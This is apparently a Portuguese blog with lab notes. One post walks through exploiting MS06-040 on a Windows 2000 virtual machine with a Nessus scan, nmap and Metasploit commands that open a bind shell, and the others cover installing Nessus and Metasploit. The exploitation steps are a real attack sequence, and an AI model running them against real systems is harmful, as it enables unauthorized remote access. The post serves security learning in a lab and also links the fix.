Cobaia: windows 2000 rodando no virtualbox
1) ligar windows 2000 e configurar rede (no meu caso 50.0.0.10)
2) com Nessus, fazer varredura na maquina win2000
3) identificar a vulnerabilidade ms06-040
4) Com nmap, identificar a porta 445 aberta (etapa não obrigatória)
nmap 50.0.0.10 -p 445
5) Metasploit
$ msfconsole
show exploits (identificar o ms06-040)
use windows/smb/ms06_040_netapi
set RHOST 50.0.0.10 (IP do alvo)
set LHOST 50.0.0.2 (IP origem)
show payloads (o que se deseja apos explorar vulnerabilidade)
set PAYLOAD windows/shell/bind_tcp
exploit
Para consertar a vulnerabilidade, baixar o patch http://technet.microsoft.com/en-us/security/bulletin/ms06-040
segunda-feira, 26 de setembro de 2011
Instalação do Nessus
Vamos direto ao ponto para não complicar.
a) Acessar para fazer download em http://www.tenable.com/products/nessus/nessus-download-agreement
No meu caso foi .deb para 64bits: http://downloads.nessus.org/nessus3dl.php?file=Nessus-4.4.1-debian5_amd64.deb&licence_accept=yes&t=26b8a3dbd1ccd6c38aeb0b2fe925ad0a
b) instalar normalmente
# dpkg -i Nessus*.deb
c) Após a instalação ele dá os passos, que são:
# /opt/nessus/sbin/nessus-adduser (criar usuario)
d) registrar no site: http://www.nessus.org/register/:
A chave de registro bem como as instruções são enviadas para o e-mail.
Normalmente faz-se assim:
# /opt/nessus/bin/nessus-fetch --register (chave que recebeu no email)
e) rodar o servidor nessus:
# /opt/nessus/sbin/nessusd
f) acessar a interface gráfica e utilizar:
https://localhost:8834
obs.: pode-se criar outros usuários não-administradores via linha de comando ou na interface web.
a) Acessar para fazer download em http://www.tenable.com/products/nessus/nessus-download-agreement
No meu caso foi .deb para 64bits: http://downloads.nessus.org/nessus3dl.php?file=Nessus-4.4.1-debian5_amd64.deb&licence_accept=yes&t=26b8a3dbd1ccd6c38aeb0b2fe925ad0a
b) instalar normalmente
# dpkg -i Nessus*.deb
c) Após a instalação ele dá os passos, que são:
# /opt/nessus/sbin/nessus-adduser (criar usuario)
d) registrar no site: http://www.nessus.org/register/:
A chave de registro bem como as instruções são enviadas para o e-mail.
Normalmente faz-se assim:
# /opt/nessus/bin/nessus-fetch --register (chave que recebeu no email)
e) rodar o servidor nessus:
# /opt/nessus/sbin/nessusd
f) acessar a interface gráfica e utilizar:
https://localhost:8834
obs.: pode-se criar outros usuários não-administradores via linha de comando ou na interface web.
Instalação do Metasploit
Testado em Debian e Ubuntu, mas creio que funciona para qualquer outra distribuição uma vez que foi utilizado pacote universal.
1) baixar o pacote instalador em http://www.metasploit.com/download/:
No meu caso baixei o 64bits full setup (http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run)
2) Alterar para root com "su -" e instalar o pacote dentro o /opt:
$ su - (atenção, não funcionou com "su", pois não carrega todas as variáveis de ambiente)
# chmod 700 framework*.run
# ./framework*.run (deve perguntar se deseja atualizar base, então diga sim)
3) Atualizar a base de dados caso não o tenha feito:
# msfupdate
4) Utilizar o metasploit como usuário comum:
$ msfconsole
Quanto ao uso do metasploit, futuramente coloco algumas instruções.
1) baixar o pacote instalador em http://www.metasploit.com/download/:
No meu caso baixei o 64bits full setup (http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run)
2) Alterar para root com "su -" e instalar o pacote dentro o /opt:
$ su - (atenção, não funcionou com "su", pois não carrega todas as variáveis de ambiente)
# chmod 700 framework*.run
# ./framework*.run (deve perguntar se deseja atualizar base, então diga sim)
3) Atualizar a base de dados caso não o tenha feito:
# msfupdate
4) Utilizar o metasploit como usuário comum:
$ msfconsole
Quanto ao uso do metasploit, futuramente coloco algumas instruções.
Assinar:
Postagens (Atom)